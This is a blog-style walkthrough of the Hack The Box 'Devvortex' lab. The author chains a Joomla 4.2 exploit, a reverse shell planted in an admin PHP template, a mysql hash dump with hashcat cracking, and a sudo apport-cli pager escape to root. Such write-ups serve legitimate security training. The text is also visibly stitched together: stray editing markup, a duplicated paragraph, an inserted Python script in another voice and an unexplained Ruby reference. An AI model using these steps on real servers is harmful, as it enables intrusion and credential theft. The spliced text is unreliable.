DEVVORTEX HTB

0xLeonidas
7 min read, Nov 28, 2023


Devvortex: Hack The Box

Wagwan my mates, how's it going? We're back again giving y'all the most detailed walkthrough of Hack The Box labs. Without much blabbity-blab, let's get into it.

First, as usual, we run an Nmap scan to see what's going on with this lab.

Nmap scan

Nothing much came up: SSH, which we keep in reserve for later, and an HTTP service. So I went to my browser and entered the IP address, 10.10.11.242.

It didn't go through, but a hostname showed up in the browser's address bar, so I added the IP address and that name (devvortex.htb) to /etc/hosts: open it with nano and add the line 10.10.11.242 devvortex.htb.

Once that was done, I browsed to the domain and it went through.

As soon as that came up, I busted out the tool I love for directory brute-forcing and highly recommend: dirsearch. Not many useless parameters, very straightforward.

Nothing much came out again; as you can see, not many "200 OK" responses, lol.

Still figuring out what to do, I went through the devvortex.htb site to see what's up, including the source code, which I recommend you always check when doing CTFs, but there wasn't much there either. Then I thought: vhosts/subdomains, why not?

Fortunately I used gobuster and it gave me something. Not gonna lie, gobuster gave me a bit of a headache: I kept using VHOST instead of DNS and spent some time on this, but I got it. Hey, we're all learning, lol.

So I got dev.devvortex.htb and, without much caution, proceeded to check it out.

Same methodology: I went through the site and the source code and tested every function, to no avail. Then I figured, directory enumeration, no stress. I busted out dirsearch again and it did not disappoint, lol.

Having seen everything that was there, I spotted README.txt and did not hesitate to open it. It turned out the site was running Joomla 4.2. How blissful.

While looking for a Joomla 4.2 exploit, I checked the /administrator path and found a login page. You know me, I'm there ASAP :[ ]

Eventually I found an exploit on GitHub for Joomla: an exfiltration tool for a vulnerability this version is affected by.

One thing that tripped me up a lot on this box is the spelling of devvortex. I kept running the exploit against devortex.htb (one v) instead of devvortex.htb (two v's). Once I noticed, I was on my way to hacking this box.

After I ran the tool, I had the login information for /administrator, and it worked!

Once in, the obvious next step is to get a reverse shell. There's a lot of functionality in this admin panel; I checked and checked and tried the upload, nothing much. Not gonna lie, I got a little hint here: I looked at the templates and saw they're made of PHP files, hehe.
</gml_replace>
<gr_replace lines="46" cat="clarify" orig="so i navigated to">
So I navigated to where the templates are kept, and note: the administrator templates, since the login we have is an administrator.

so i navigated to where the templates where kept, and note, admin templates, because the login we got is an administrator

Once there, I saw the PHP files and figured I'd drop a reverse-shell one-liner into an exec() call. Nothing big.

I picked index.php. Note that if you edit any other PHP file, you'll have to browse to that file's path to trigger your code; it only runs when the server actually renders that file.

I used this payload and edited it with my IP address and my desired port.

Then I started a netcat listener on my local machine, waiting for the incoming connection on that port.

I pasted it in, clicked save, and didn't even need to refresh: I got a shell straight away, because the admin page I was on is itself served by index.php.

I navigated to /home/logan but couldn't cat the user flag, so apparently we need a shell as logan. If you remember, the output of the Ruby script listed a "logan" user.

I spent a lot of time here, but finally tried mysql and got a response, which tells me we can run some SQL queries to look for user passwords. The next thing was to check whether lewis, our current user, could run queries, and apparently he could. But the first time I tried, the mysql session was not interactive and I had to google what was wrong. I'd urge you to do this in every shell you land so you don't have problems with a non-interactive shell: I upgraded to an interactive shell with python3 -c 'import pty; pty.spawn("/bin/bash")'.

Then I ran the mysql client so I could interact with the database:

mysql -u lewis -p

It prompted me for a password; I entered the lewis password we already had and was in, ready to query for the "logan" user's password hash.

My first query errored with "no database selected", so I just ran use joomla;

Then show tables; listed a table ending in _users. I immediately checked it with a select-all, which translates to SELECT * FROM sd4fg_users; in SQL, and got back the users with their password hashes.

Without wasting effort, I busted out hashcat, which I like better than John the Ripper. The hashes were bcrypt (you can tell from the $2y$ prefix), which is hashcat mode 3200, so you crack them with -m 3200. I cracked the hash and got logan's password.
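Here's an added example, my own code rather than anything from the original post, hashcat or Joomla, covering the glue between the two steps above: it parses the boxed table the interactive mysql client prints for SELECT * FROM sd4fg_users, pulls out the username and password columns, picks the hashcat mode from the hash prefix, and builds the user:hash lines (and the command line) hashcat expects. The table below is constructed sample data with made-up hashes; the column names and the wordlist path are assumptions. It goes slightly beyond the post by also recognising the other common crypt-style prefixes and Joomla's legacy md5:salt format, since a real dump may mix them.

```python
"""Joomla users-table dump -> hashcat input (added example, not the post's code)."""
import re
from collections import defaultdict

# Constructed sample with fake hashes: what the `mysql>` prompt prints for
#   SELECT id, name, username, password FROM sd4fg_users;
SAMPLE_MYSQL_OUTPUT = """\
+-----+------------+----------+--------------------------------------------------------------+
| id  | name       | username | password                                                     |
+-----+------------+----------+--------------------------------------------------------------+
| 649 | lewis      | lewis    | $2y$10$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234 |
| 650 | logan paul | logan    | $2y$10$ZYXWVUTSRQPONMLKJIHGFE9876543210zyxwvutsrqponmlkjihgf |
+-----+------------+----------+--------------------------------------------------------------+
2 rows in set (0.00 sec)
"""

# (regex on the stored hash, hashcat -m value, label). Order matters: first match wins.
HASH_MODES = [
    (re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), 3200, "bcrypt"),
    (re.compile(r"^\$6\$"), 1800, "sha512crypt"),
    (re.compile(r"^\$5\$"), 7400, "sha256crypt"),
    (re.compile(r"^\$1\$"), 500, "md5crypt"),
    (re.compile(r"^\$[PH]\$"), 400, "phpass"),
    (re.compile(r"^[0-9a-f]{32}:.+$"), 11, "joomla-legacy md5(pass.salt)"),
]


def parse_mysql_table(text):
    """Parse the boxed table the interactive mysql client prints into a list of dicts.

    Border lines (+---+), the "N rows in set" trailer and blank lines are skipped;
    the first |-delimited line is the header, every later one is a row.
    """
    rows, header = [], None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def identify(hash_value):
    """Return (hashcat mode, label) for a stored hash, or (None, 'unknown')."""
    for pattern, mode, label in HASH_MODES:
        if pattern.match(hash_value):
            return mode, label
    return None, "unknown"


def to_hashcat(rows, user_col="username", hash_col="password"):
    """Group 'user:hash' lines by hashcat mode; hashcat runs one mode at a time."""
    by_mode = defaultdict(list)
    for row in rows:
        mode, _ = identify(row[hash_col])
        by_mode[mode].append(f"{row[user_col]}:{row[hash_col]}")
    return dict(by_mode)


def hashcat_commands(by_mode, wordlist="/usr/share/wordlists/rockyou.txt"):
    """One dictionary-attack command per recognised mode (wordlist path assumed).

    --username makes hashcat ignore the 'user:' prefix in each line.
    """
    return [
        f"hashcat -m {mode} -a 0 --username hashes_m{mode}.txt {wordlist}"
        for mode in by_mode
        if mode is not None
    ]


if __name__ == "__main__":
    parsed = parse_mysql_table(SAMPLE_MYSQL_OUTPUT)
    grouped = to_hashcat(parsed)
    for mode, lines in grouped.items():
        print(f"# hashes_m{mode}.txt ({identify(lines[0].split(':', 1)[1])[1]})")
        print("\n".join(lines))
    print("\n".join(hashcat_commands(grouped)))
```

Run it and paste the printed lines into the named file, then run the printed hashcat command; the --username flag means you get user:hash:password pairs back from hashcat --show, which is what you want when more than one account is in the dump.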

With the credentials I now had, SSH seemed plausible, plus the Nmap output showed SSH on port 22, lol, that's the default port.

No time to waste: I logged in over SSH as logan and went straight for the jugular, cat /home/logan/user.txt,

and got the user flag.

ROOT [PRIVILEGE ESCALATION]

Not gonna lie, this gave me a little stress, but eventually it was something simple to figure out.

I ran linpeas, which is basically the first thing I do when I break into a Linux box, and wasted quite a lot of time on it. If you've done some courses on Hack The Box Academy, I always do what I practiced there: the command sudo -l lists what the current user is allowed to run with sudo, and if one of those entries is abusable, that's your path to root.

It showed a command the user can run with sudo. I put that into Google, copied and pasted what came up, appended "poc exploit", and found this:

I tried it and it worked, so let's dive into how. First, per the GitHub PoC, there should be a .crash file in /var/crash. As you can see, I listed the directory right away, there was a .crash file, and I proceeded with the PoC.

I ran sudo /usr/bin/apport-cli -c /var/crash/the_crash_file.crash, which prompts you to choose an option; you choose V (view the report). This is me following the PoC to the letter :[)

I ran the command, chose V, and it started loading the crash file.

When it gets to the point where you see the : (colon) prompt, type !id and you get output as root. The colon prompt belongs to the pager (less) that apport-cli opens to show the report; because apport-cli is running under sudo, so is the pager, and less's ! command hands the rest of the line to a shell. So it's the ! (exclamation mark) that triggers execution as root; !/bin/bash instead of !id drops you into a root shell, and then cat /root/root.txt. It was a fun box, and above all, the point is to learn on each box you pwn.

you can reach me at 0x_Leo_nidas300@proton.me or on twitter at _0xLeonidas

That’s it peeps, see you lots later, peace!✊🏿✊🏿
